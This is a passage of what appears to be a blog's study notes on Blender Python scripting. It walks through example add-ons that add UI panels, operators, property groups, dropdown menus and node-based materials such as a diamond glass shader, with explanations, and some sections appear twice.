        bpy.context.object.active_material = material_basic

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)

def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)


if __name__ == "__main__":
    register()

Run it!

    Create Property Group & Enumerator (Panel)

This code is an example Blender add-on that creates a panel and an operator implementing some simple functionality.

First, a MyProperties class is defined, inheriting from bpy.types.PropertyGroup. It defines three properties: my_string, a string shown as a text box; my_float_vector, a float vector shown as three sliders; and my_enum, an enum shown as a drop-down menu with three options.

Then ADDONNAME_PT_main_panel, inheriting from bpy.types.Panel, defines a panel containing widgets for those three properties plus a button for the addonname.myop_operator operator.

Next, ADDONNAME_OT_my_op, inheriting from bpy.types.Operator, handles that button. Its execute() method calls the matching Blender function for the currently selected enum option: for "Add Cube" it creates a cube with bpy.ops.mesh.primitive_cube_add(), names it after mytool.my_string, and scales it by the values in mytool.my_float_vector; the other options do the same with a sphere or Suzanne. It finishes by returning {'FINISHED'}.

Finally, the classes list holds the three classes, and register()/unregister() register and unregister the add-on; registration assigns a PointerProperty of type MyProperties to bpy.types.Scene.my_tool. Running the script registers the add-on automatically.

Overall, this is a small example of defining custom properties and operators and wiring them into a panel for simple interactive use.

import bpy


class MyProperties(bpy.types.PropertyGroup):
    my_string: bpy.props.StringProperty(name='Enter Text')
    my_float_vector: bpy.props.FloatVectorProperty(name='Enter Value', soft_min=0, soft_max=1000, default=(1, 1, 1))
    my_enum: bpy.props.EnumProperty(
        name='Enumerator / Dropdown',
        description='sample text',
        items=[('OP1', 'Add Cube', ''),
               ('OP2', 'Add Sphere', ''),
               ('OP3', 'Add Suzanne', '')
        ]
    )


class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        layout.prop(mytool, 'my_string')
        layout.prop(mytool, 'my_float_vector')
        layout.prop(mytool, 'my_enum')

        row = layout.row()
        row.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Operator"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool

        if mytool.my_enum == 'OP1':
            bpy.ops.mesh.primitive_cube_add()
            bpy.context.object.name = mytool.my_string
            bpy.context.object.scale[0] = mytool.my_float_vector[0]
            bpy.context.object.scale[1] = mytool.my_float_vector[1]
            bpy.context.object.scale[2] = mytool.my_float_vector[2]
        if mytool.my_enum == 'OP2':
            bpy.ops.mesh.primitive_uv_sphere_add()
            bpy.context.object.name = mytool.my_string
            bpy.context.object.scale[0] = mytool.my_float_vector[0]
            bpy.context.object.scale[1] = mytool.my_float_vector[1]
            bpy.context.object.scale[2] = mytool.my_float_vector[2]
        if mytool.my_enum == 'OP3':
            bpy.ops.mesh.primitive_monkey_add()
            bpy.context.object.name = mytool.my_string
            bpy.context.object.scale[0] = mytool.my_float_vector[0]
            bpy.context.object.scale[1] = mytool.my_float_vector[1]
            bpy.context.object.scale[2] = mytool.my_float_vector[2]
        return {'FINISHED'}


classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type=MyProperties)

def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()

The result: an add-on that creates a model and sets its parameters:

    Property Subtypes and Password Protection

Mainly covers the subtype option of StringProperty and FloatVectorProperty.

In the Blender Python API, the subtype of StringProperty and FloatVectorProperty includes the following options.

For StringProperty:

• FILE_PATH: a file path.
• DIR_PATH: a directory path.
• FILE_NAME: a file name.
• PASSWORD: a password.
• NONE: plain text.

For FloatVectorProperty:

• COLOR: a color value (RGB).
• TRANSLATION: a translation vector.
• DIRECTION: a direction vector.
• VELOCITY: a velocity vector.
• ACCELERATION: an acceleration vector.
• NONE: plain floats.

These subtype values let you create differently-behaved properties to suit a given scenario. For example, FILE_PATH or DIR_PATH gives the user a file or directory picker, and COLOR gives a color picker for choosing RGB values; see the sketch below.
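A minimal sketch of the file-picker and color-picker cases (class and property names here are placeholders, not from the tutorial):

import bpy


class SubtypeDemoProps(bpy.types.PropertyGroup):
    # draws with a folder icon that opens Blender's file browser
    texture_path: bpy.props.StringProperty(name="Texture", subtype='FILE_PATH')
    # draws as a clickable color swatch with a color picker
    tint: bpy.props.FloatVectorProperty(name="Tint", subtype='COLOR',
                                        size=3, min=0.0, max=1.0,
                                        default=(1.0, 1.0, 1.0))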

And a use case for the password subtype:

import bpy


class MyProperties(bpy.types.PropertyGroup):
    my_string : bpy.props.StringProperty(name= "Password", subtype= 'PASSWORD')


class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        row = layout.row()
        split = row.split(factor= 0.5)

        row.prop(mytool, "my_string")

        layout.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Confirm"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool

        if mytool.my_string == "awesomepassword":
            bpy.ops.mesh.primitive_cube_add()
        return {'FINISHED'}


classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type= MyProperties)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()


    Blender 2.90 is here! - Scripting Changes!!?

Covers the new features of the 2.90 release... emmm, and I'm already on 3.5.1.

    Read an Error Message and how to Fix it [learn python for beginners]

Shows how to read an error message and use it to debug your code; a typical traceback is sketched below.
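A hypothetical illustration (not from the video): read a traceback from the bottom up, since the last line names the error while the lines above it point at the file and line that raised it:

import bpy

cube = bpy.data.objects['Cube']
cube.locaton = (0, 0, 2)  # typo: should be 'location'

# Traceback (most recent call last):
#   ...
# AttributeError: 'Object' object has no attribute 'locaton'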

    Importing Modules

Shows how to use the from ... import statement; a short example follows.
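A minimal example, mirroring the imports used throughout these notes:

import bpy                   # import the whole module; members stay qualified
from bpy.types import Panel  # import a specific name from a module
from random import randint   # the imported name is then used unqualified

print(randint(0, 9))
print(bpy.app.version)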

    ]]>
    + 课程

    Updated Registration Method

    emmmm 就是把 register() 里注册的类放到一个 for 循环里:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    def register():
    bpy.utils.register_class(NODE_OT_compGroup)
    bpy.utils.register_class(NODE_PT_customPanel)


    def unregister():
    bpy.utils.unregister_class(NODE_OT_compGroup)
    bpy.utils.unregister_class(NODE_PT_customPanel)


    if __name__ == "__main__":
    register()

    改为:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    classes = [NODE_OT_compGroup, NODE_PT_customPanel, YOUR_CLASS_NAME]

    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    5 Scripting Tips for Beginners

    介绍了一些小技巧:

    在 python console 里,输入代码:

    列出场景中已有的 3D 物体:

    1
    list(bpy.data.objects)

    列出场景中已有的材质:

    1
    list(bpy.data.materials)

    新建一个材质:

    1
    bpy.data.materials.new("My Material")

    Text Editor 中,Text-Live Edit 可以实时运行脚本。

    jpg

    Enumerator / Drop down Menu

    这段代码定义了两个类和两个函数,用于在 Blender 中添加一个面板和一个操作员。

    1. ADDONNAME_PT_TemplatePanel 类 该类继承自 bpy.types.Panel,它创建了一个面板并定义了它的一些属性。bl_label 属性定义了面板的名称,bl_idname 属性是面板的唯一标识符,bl_space_type 和 bl_region_type 属性定义了面板在哪个空间和区域中显示,bl_category 属性定义了面板应该显示在哪个选项卡中。draw() 方法定义了面板的布局和内容,layout 变量用来管理面板的布局和元素,layout.operator() 方法添加了一个操作按钮,该按钮调用名为 “wm.template_operator” 的操作员。
    2. ADDONANE_OT_TemplateOperator 类 该类继承自 bpy.types.Operator,它创建了一个操作员,并定义了它的一些属性。bl_label 属性创建了操作员的按钮标签,bl_idname 属性是操作员的唯一标识符。preset_enum 属性是一个枚举值,它提供了三个不同的选项,每个选项都有一个唯一的 id、一个名称和一个描述。invoke() 方法定义了当用户单击操作员时执行的代码,draw() 方法定义了操作员的布局和内容,execute() 方法定义了操作员执行的代码。
    3. register() 函数 该函数使用 bpy.utils.register_class() 方法注册 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类,将它们添加到 Blender 中。
    4. unregister() 函数 该函数使用 bpy.utils.unregister_class() 方法取消注册 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类,将它们从 Blender 中移除。

    最后,如果该脚本被直接运行(而不是被其他脚本导入),则调用 register() 函数将 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类添加到 Blender 中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    import bpy


    class ADDONNAME_PT_TemplatePanel(bpy.types.Panel):
    bl_label = 'Name of the Panel'
    bl_idname = 'ADDONNAME_PT_TemplatePanel'
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Template Tab'

    def draw(self, context):
    layout = self.layout

    layout.operator('wm.template_operator')


    class ADDONANE_OT_TemplateOperator(bpy.types.Operator):
    bl_label = 'Template Operator'
    bl_idname = 'wm.template_operator'

    preset_enum: bpy.props.EnumProperty(
    name='',
    description='Select an option',
    items=[
    ('OP1', 'Cube', 'Add a Cube to the scene'),
    ('OP2', 'Sphere', ''),
    ('OP3', 'Suzanne', 'Add Suzanne to the scene')
    ]
    )


    def invoke(self, context, event):
    wm = context.window_manager
    return wm.invoke_props_dialog(self)


    def draw(self, context):
    layout = self.layout
    layout.prop(self, 'preset_enum')


    def execute(self, context):
    if self.preset_enum == 'OP1':
    bpy.ops.mesh.primitive_cube_add()
    if self.preset_enum == 'OP2':
    bpy.ops.mesh.primitive_uv_sphere_add()
    if self.preset_enum == 'OP3':
    bpy.ops.mesh.primitive_monkey_add()
    return {'FINISHED'}


    def register():
    bpy.utils.register_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.register_class(ADDONANE_OT_TemplateOperator)


    def unregister():
    bpy.utils.unsregister_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.unregister_class(ADDONANE_OT_TemplateOperator)


    if __name__ == '__main__':
    register()

    运行代码,enum 会创建一个下拉菜单:

    jpg

    Class Naming Convention

    介绍了 Blender 命名传统规则:Darkfall : Blender Python Tutorial: Class Naming Convention (darkfallblender.blogspot.com)

    How to create and assign a Material Shader

    这段代码实现了一个简单的 Blender 插件,在 3D 视图空间中添加了一个面板和一个操作。具体解释如下:

    1. import bpy 导入了 Blender 的 Python API。
    2. ADDONNAME_PT_main_panel(bpy.types.Panel) 定义了一个继承自 bpy.types.Panel 的面板类,并将其命名为 ADDONNAME_PT_main_panel。在类的内部,定义了面板的相关属性和 draw() 方法。
    3. bl_label 中指定了面板标签文本,bl_idname 中指定了面板的 ID。bl_space_type 指定了面板支持的空间类型,这里使用 'VIEW_3D' 表示只会在 3D 视图空间中显示。bl_region_type 指定了面板所占的区域类型,这里使用 'UI' 表示在 UI 区域中显示。bl_category 指定了面板所属的类别,这里使用 'New Tab' 表示添加到一个名为 'New Tab' 的新标签页中。
    4. draw() 方法中,通过 self.layout.operator() 添加了一个操作按钮,用于执行 ADDONNAME_OT_add_basic 操作。
    5. ADDONNAME_OT_add_basic(bpy.types.Operator) 类定义了一个继承自 bpy.types.Operator 的操作类,并将其命名为 ADDONNAME_OT_add_basic。其中,bl_label 指定了操作在 UI 中的显示名称,bl_idname 指定了操作的 ID。
    6. 在类中定义了一个名为 col 的属性,类型为 bpy.props.FloatVectorProperty。这个属性是一个四元组,表示 RGBA 颜色值。
    7. execute() 方法中实现了插件的核心逻辑,用于创建一个新的材质,并将其应用到当前选择的对象上。具体来说,这个方法中首先创建了一个名为 material_basic 的新材质,并设置其使用节点。然后通过 material_basic.node_tree.nodes.get('Principled BSDF') 获取材质的 Principled BSDF 节点,并将其 metallic 参数设置为 0.08。接着,创建了一个 ShaderNodeRGB 节点,并将其颜色值设置为 self.col 中存储的颜色值。最后,通过 material_basic.node_tree.links.new() 创建了两个节点之间的连接,并将材质应用到当前选择的对象上。
    8. invoke() 方法用于在用户执行操作时打开一个小型对话框,以便用户在对话框中设置属性值。返回值表示执行结果。
    9. classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic] 定义了一个列表,其中包含了需要进行注册的所有类。
    10. register() 函数中,使用 bpy.utils.register_class() 分别注册了 classes 列表中的每一个类。
    11. unregister() 函数中,使用 bpy.utils.unregister_class() 分别注销了 classes 列表中的每一个类。
    12. if __name__ == "__main__": register() 是一个常用的语法,表示在插件文件被直接运行时自动执行注册函数进行注册。

    原网址 Darkfall : Blender Python Tutorial: How to Create and Assign a Shader Material (darkfallblender.blogspot.com) 下的代码太旧了,要把 col = bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) 改成 col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) 才能跑,这是我第二次进坑了 orz

import bpy


class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Add Shader Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
        layout = self.layout
        layout.operator("addonname.addbasic_operator")


class ADDONNAME_OT_add_basic(bpy.types.Operator):
    bl_label = "Add Basic Shader"
    bl_idname = "addonname.addbasic_operator"

    col: bpy.props.FloatVectorProperty(name="Color", subtype='COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0))

    def execute(self, context):
        material_basic = bpy.data.materials.new(name="Basic")
        material_basic.use_nodes = True

        principled_node = material_basic.node_tree.nodes.get('Principled BSDF')
        principled_node.inputs[7].default_value = 0.08  # index-based socket access is version-dependent

        rgb_node = material_basic.node_tree.nodes.new('ShaderNodeRGB')
        rgb_node.location = (-250, 0)
        rgb_node.outputs[0].default_value = self.col

        link = material_basic.node_tree.links.new
        link(rgb_node.outputs[0], principled_node.inputs[0])

        bpy.context.object.active_material = material_basic

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)


if __name__ == "__main__":
    register()

Run it!

[screenshot]

    Create Property Group & Enumerator (Panel)

This code is an example Blender add-on that creates a panel and an operator implementing a few simple features.

First, a MyProperties class, inheriting from bpy.types.PropertyGroup, defines three properties: my_string, a string shown as a text field; my_float_vector, a float vector shown as three sliders; and my_enum, an enum shown as a dropdown containing three operation options.

Next, ADDONNAME_PT_main_panel, inheriting from bpy.types.Panel, defines a panel containing widgets for those three properties, followed by a button for the addonname.myop_operator operator.

Then ADDONNAME_OT_my_op, inheriting from bpy.types.Operator, handles that button. Its execute() method branches on the currently selected enum option and calls the matching Blender function. For example, with "Add Cube" selected it calls bpy.ops.mesh.primitive_cube_add() to create a cube, names it after mytool.my_string, and scales it by the values in mytool.my_float_vector. Finally it returns {'FINISHED'} to signal the operation completed.

Lastly, the classes list holds the three classes, and the register() and unregister() functions register and unregister the add-on; register() also assigns a PointerProperty to MyProperties onto bpy.types.Scene.my_tool. Running the script registers the add-on automatically.

Overall, this is a simple example showing how to create custom properties and operators and expose them in a panel for basic interactive use.

import bpy


class MyProperties(bpy.types.PropertyGroup):
    my_string: bpy.props.StringProperty(name='Enter Text')
    my_float_vector: bpy.props.FloatVectorProperty(name='Enter Value', soft_min=0, soft_max=1000, default=(1, 1, 1))
    my_enum: bpy.props.EnumProperty(
        name='Enumerator / Dropdown',
        description='sample text',
        items=[
            ('OP1', 'Add Cube', ''),
            ('OP2', 'Add Sphere', ''),
            ('OP3', 'Add Suzanne', '')
        ]
    )


class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        layout.prop(mytool, 'my_string')
        layout.prop(mytool, 'my_float_vector')
        layout.prop(mytool, 'my_enum')

        row = layout.row()
        row.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Operator"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool

        if mytool.my_enum == 'OP1':
            bpy.ops.mesh.primitive_cube_add()
            bpy.context.object.name = mytool.my_string
            bpy.context.object.scale[0] = mytool.my_float_vector[0]
            bpy.context.object.scale[1] = mytool.my_float_vector[1]
            bpy.context.object.scale[2] = mytool.my_float_vector[2]
        if mytool.my_enum == 'OP2':
            bpy.ops.mesh.primitive_uv_sphere_add()
            bpy.context.object.name = mytool.my_string
            bpy.context.object.scale[0] = mytool.my_float_vector[0]
            bpy.context.object.scale[1] = mytool.my_float_vector[1]
            bpy.context.object.scale[2] = mytool.my_float_vector[2]
        if mytool.my_enum == 'OP3':
            bpy.ops.mesh.primitive_monkey_add()
            bpy.context.object.name = mytool.my_string
            bpy.context.object.scale[0] = mytool.my_float_vector[0]
            bpy.context.object.scale[1] = mytool.my_float_vector[1]
            bpy.context.object.scale[2] = mytool.my_float_vector[2]
        return {'FINISHED'}


classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type=MyProperties)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()

This produces an add-on that can create a model and set its parameters:

[screenshot]

    Property Subtypes and Password Protection

Mainly covers the subtype option of StringProperty and FloatVectorProperty.

In the Blender Python API, the subtype option of StringProperty and FloatVectorProperty offers the following values.

For StringProperty:

• FILE_PATH: a file path.
• DIR_PATH: a directory path.
• FILE_NAME: a file name.
• PASSWORD: a password (input is masked).
• NONE: plain text.

For FloatVectorProperty:

• COLOR: a color value (RGB).
• TRANSLATION: a translation vector.
• DIRECTION: a direction vector.
• VELOCITY: a velocity vector.
• ACCELERATION: an acceleration vector.
• NONE: plain floats.

With these subtype values you can create properties tailored to a given scenario. For example, FILE_PATH or DIR_PATH gives the user a file or directory picker, and COLOR gives a color picker for choosing RGB values.
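As a quick sketch of how subtype changes the widget (the group and property names here are made up; the properties are drawn with layout.prop() as usual):

import bpy

class SubtypeDemoProps(bpy.types.PropertyGroup):  # hypothetical group for illustration
    # FILE_PATH draws the field with a file-browser button next to it
    source_file: bpy.props.StringProperty(name="Source", subtype='FILE_PATH')
    # COLOR draws a clickable color swatch instead of three plain sliders
    tint: bpy.props.FloatVectorProperty(name="Tint", subtype='COLOR', size=3,
                                        min=0.0, max=1.0, default=(1.0, 1.0, 1.0))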

A password use case:

import bpy


class MyProperties(bpy.types.PropertyGroup):
    my_string: bpy.props.StringProperty(name="Password", subtype='PASSWORD')


class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        row = layout.row()
        split = row.split(factor=0.5)  # unused in this example

        row.prop(mytool, "my_string")

        layout.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Confirm"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool

        if mytool.my_string == "awesomepassword":
            bpy.ops.mesh.primitive_cube_add()
        return {'FINISHED'}


classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type=MyProperties)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()

[screenshot]

    Blender 2.90 is here! - Scripting Changes!!?

Covers the scripting changes in version 2.90... emmm, I'm already on 3.5.1 anyway.

    Read an Error Message and how to Fix it [learn python for beginners]

Teaches you how to read an error message and debug your code based on it.
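For instance, a script like the following fails when nothing is selected; reading the traceback from the bottom up gives the exception type and message, then the file and line that raised it (a minimal sketch; the exact file label depends on where the script runs):

import bpy

def rename_active():
    obj = bpy.context.object  # None when nothing is selected
    obj.name = 'Renamed'      # raises AttributeError: 'NoneType' object has no attribute 'name'

rename_active()
# Traceback (most recent call last):
#   File "\Text", line 7, in <module>
#   File "\Text", line 5, in rename_active
# AttributeError: 'NoneType' object has no attribute 'name'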

    Importing Modules

Teaches you how to use the from ... import statement.
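A minimal sketch of the difference:

import bpy                        # qualified access: bpy.ops.mesh...
bpy.ops.mesh.primitive_cube_add()

from bpy import ops               # import a name from the package...
ops.mesh.primitive_uv_sphere_add()

from math import radians          # ...and the same works for the standard library
print(radians(90))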

Resources

Course

    An Introduction to Scripting

Change the layout as shown below; dragging the top-right corner of a view splits it off:

[screenshot]

Write the Python code:

import bpy


class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.label(text='Add an object', icon='CUBE')
        row = layout.row()
        row.operator('mesh.primitive_cube_add', icon='CUBE')
        row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
        row = layout.row()
        row.operator('object.text_add', icon='FILE_FONT')


def register():
    bpy.utils.register_class(TestPanel)


def unregister():
    bpy.utils.unregister_class(TestPanel)


if __name__ == '__main__':
    register()

This Python code adds a panel to Blender named "Test Panel", shown in the 3D Viewport, in the UI (sidebar) region, under the "My 1st Addona" category. The panel holds three buttons: add a cube, add a sphere, and add text.

In detail:

• The first line imports Blender's Python API so Blender functionality can be used from Python.
• Next, the TestPanel class, inheriting from bpy.types.Panel, creates the panel. bl_label is the displayed name; bl_idname gives the panel a unique ID so it can be referenced elsewhere; bl_space_type picks the editor space it appears in, here 'VIEW_3D', the 3D Viewport; bl_region_type picks the region, here 'UI', the sidebar; bl_category picks the tab it is grouped under, here "My 1st Addona".
• Then comes the draw function, which draws the panel's widgets. self.layout is the layout object for the whole panel; its row() method starts a row of widgets. Here we first create a row with a label, then two buttons calling mesh.primitive_cube_add (add a cube) and mesh.primitive_uv_sphere_add (add a sphere), and finally a button for adding text.
• register() uses bpy.utils.register_class() to register TestPanel with Blender, making it available.
• unregister() uses bpy.utils.unregister_class() to unregister it.
• Finally, the script checks whether it is being run directly, and if so calls register().

Press N in the 3D Viewport to open the sidebar panel.

[screenshot]

Panel icon names can be looked up via Edit > Preferences > Add-ons, searching for "icon" and enabling the Icon Viewer add-on:

[screenshot]

The identifiers of the objects to be created can be found as shown below:

[screenshot]

    Finishing the Object Adder Add-on

Continue improving the add-on written earlier:

bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 5, 1),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',
}

import bpy


class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
        layout = self.layout
        layout.scale_y = 1.4

        row = layout.row()
        row.label(text='Add an object', icon='OBJECT_ORIGIN')
        row = layout.row()
        row.operator('mesh.primitive_cube_add', icon='CUBE')
        row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
        row = layout.row()
        row.operator('object.text_add', icon='FILE_FONT')


class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout
        obj = context.object

        row = layout.row()
        row.label(text='Select an option to scale your object.', icon='FONT_DATA')
        row = layout.row()
        row.operator('transform.resize')
        row = layout.row()
        layout.scale_y = 1.2

        col = layout.column()
        col.prop(obj, 'scale')


class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.label(text='Select a Special Option', icon='COLOR_BLUE')
        row = layout.row()
        row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
        row.operator('object.subdivision_set')
        row = layout.row()
        row.operator('object.modifier_add')


def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)


def unregister():
    bpy.utils.unregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.unregister_class(PanelB)


if __name__ == '__main__':
    register()

[screenshot]

You can also install add-ons written by others via Edit > Preferences > Install...:

[screenshot]

    Preview: The Shader Library Add-on (Python Tutorial Result)

    How to create an Addon (The Shader Library)

Shows how to write a shader add-on in Python.

Arrange the window layout: a Shader Editor, a 3D Viewport, and a Text Editor:

[screenshot]

This code defines a Blender add-on named "Shader Library" that provides a "Diamond" shader, reachable from the "Shader Library" tab in the 3D Viewport sidebar. Clicking the tab shows a panel containing a "Select a Shader to be added." label and a "Diamond" button; clicking the button builds the shader and assigns it to the active object.

Concretely, the file first defines the bl_info dictionary holding the add-on's name, author, version, and so on. Then the ShaderMainPanel panel class renders the user interface. The panel holds a text label and an operator with ID "shader.diamond_operator", which builds the Diamond shader. In the operator's execute() function, a new material is created with node mode enabled, the default Principled BSDF node is removed, several glass nodes colored red, green, and blue are created and linked, and finally add/mix shader nodes combine them into the final Diamond shader, which is assigned to the active object.

Finally, register() and unregister() register and unregister the add-on's classes with Blender.

bl_info = {
    'name': 'Shader Library',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 5, 1),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Shader',
}

import bpy


class ShaderMainPanel(bpy.types.Panel):
    bl_label = "Shader Library"
    bl_idname = "SHADER_PT_MAINPANEL"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Shader Library"

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.label(text='Select a Shader to be added.')
        row.operator('shader.diamond_operator')


# Create a Custom Operator for the Diamond Shader
class SHADER_OT_DIAMOND(bpy.types.Operator):
    bl_label = "Diamond"
    bl_idname = "shader.diamond_operator"

    def execute(self, context):
        # Creating a New Shader and calling it Diamond
        material_diamond = bpy.data.materials.new(name="Diamond")
        # Enabling Use Nodes
        material_diamond.use_nodes = True
        # Removing the Principled Node
        material_diamond.node_tree.nodes.remove(material_diamond.node_tree.nodes.get('Principled BSDF'))
        # Create a reference to the Material Output
        material_output = material_diamond.node_tree.nodes.get('Material Output')
        # Set location of node
        material_output.location = (-400, 0)

        # Adding Glass1 Node
        glass1_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
        # Set location of node
        glass1_node.location = (-600, 0)
        # Setting the Default Color
        glass1_node.inputs[0].default_value = (1, 0, 0, 1)
        # Setting the Default IOR Value
        glass1_node.inputs[2].default_value = 1.446

        # Adding Glass2 Node
        glass2_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
        # Set location of node
        glass2_node.location = (-600, -150)
        # Setting the Default Color
        glass2_node.inputs[0].default_value = (0, 1, 0, 1)
        # Setting the Default IOR Value
        glass2_node.inputs[2].default_value = 1.450

        # Adding Glass3 Node
        glass3_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
        # Set location of node
        glass3_node.location = (-600, -300)
        # Setting the Default Color
        glass3_node.inputs[0].default_value = (0, 0, 1, 1)
        # Setting the Default IOR Value
        glass3_node.inputs[2].default_value = 1.450

        # Create the Add Shader Node and Reference it as 'Add1'
        add1_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
        # Setting the Location
        add1_node.location = (-400, -50)
